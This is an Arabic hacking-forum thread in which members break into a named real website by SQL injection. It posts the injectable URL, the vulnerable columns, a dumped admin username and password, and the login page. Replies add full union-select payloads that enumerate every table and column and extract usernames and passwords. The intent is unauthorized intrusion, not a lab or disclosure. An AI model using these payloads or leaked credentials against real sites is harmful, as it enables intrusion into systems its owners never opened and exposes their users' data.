السلام عليكم ورحمة الله
عندي مشكلة غريبة في أختراق موقع بsql
بدأت بحقن الموقع التالي
http://www.futuresfins.com/fin-detail.php?id=173
وبحمد الله نجحت وطلعت اليوزر وبالسورد ولوحة التحكم
وهي المعلومات
http://www.futuresfins.com/fin-detail.php?id=-173/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11
users
admin:foilcore
http://www.futuresfins.com/login.html
الأعمدة المصابة1و2و11
بس عندما أرديد سجل دخول بالموقع
مابيدخل للوحة التحكم وبيضل بنفس صفحة الدخول الدخول
((إذا حدى بعرف الحل أو طلعت أنا مخربط يرد جواب ))

لا اخي شغلك صحيح ... لكن الموقع مغير كلمة الدخول اني صارت عندي كثير وما قدرت ادخل على الموقع وموجودة المواقع عندي ... بالتوفيق
للعلم جربت الموقع مالتك في برنامج الهافج واعطاني اليوزر والباس نفس الذي عندك وايظا ما دخلت ههههه
وهذة النتيجة
http://im37.gulfup.com/YkDcn.png

مشكوووووووووووووووووووووو ر على الرد والمعلومة والله يجزيك الخير

الاخي تفضل

الصور الحقن :
http://img854.imageshack.us/img854/5135/r6x4.png


الاول الاستخراج الجميع المعلومات والجداول :
http://www.futuresfins.com/fin-detail.php?id=-173 UNION SELECT concat((version()),(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables) where (0x00) in (@x:=concat(@x,0x3c62723e,@tbl:=table_name,(Select IF(( select count(*) from information_schema.columns where table_name=@tbl and column_name like 0x257061737325 >0), 0x3c666f6e7420636f6c6f723d677265656e3e3c623e202a2a 2a2070617373202a2a2a203c2f623e3c666f6e7420636f6c6f 723d626c75653e, 0x00))))))x)),2,3,4,5,6,7,8,9,10,group_concat(0x3c 666f6e7420636f6c6f723d7265643e,0x3c62723e,0x746162 6c6520203a2020,table_name,0x3c62723e,0x636f6c756d6 e2020697320203a2020,column_name,) from information_schema.columns where table_name =0x7573657273


الثاني الاستخراج اليوزر و الباس :

http://www.futuresfins.com/fin-detail.php?id=-173 UNION SELECT 1,concat(0x3c68313e,0x3c666f6e7420636f6c6f723d6772 65656e3e,0x757365722020697320203a202020,username,0 x3c62723e,0x7061737320202069732020203a202020,passw ord,0x3c2f68313e),3,4,5,6,7,8,9,10,11 from users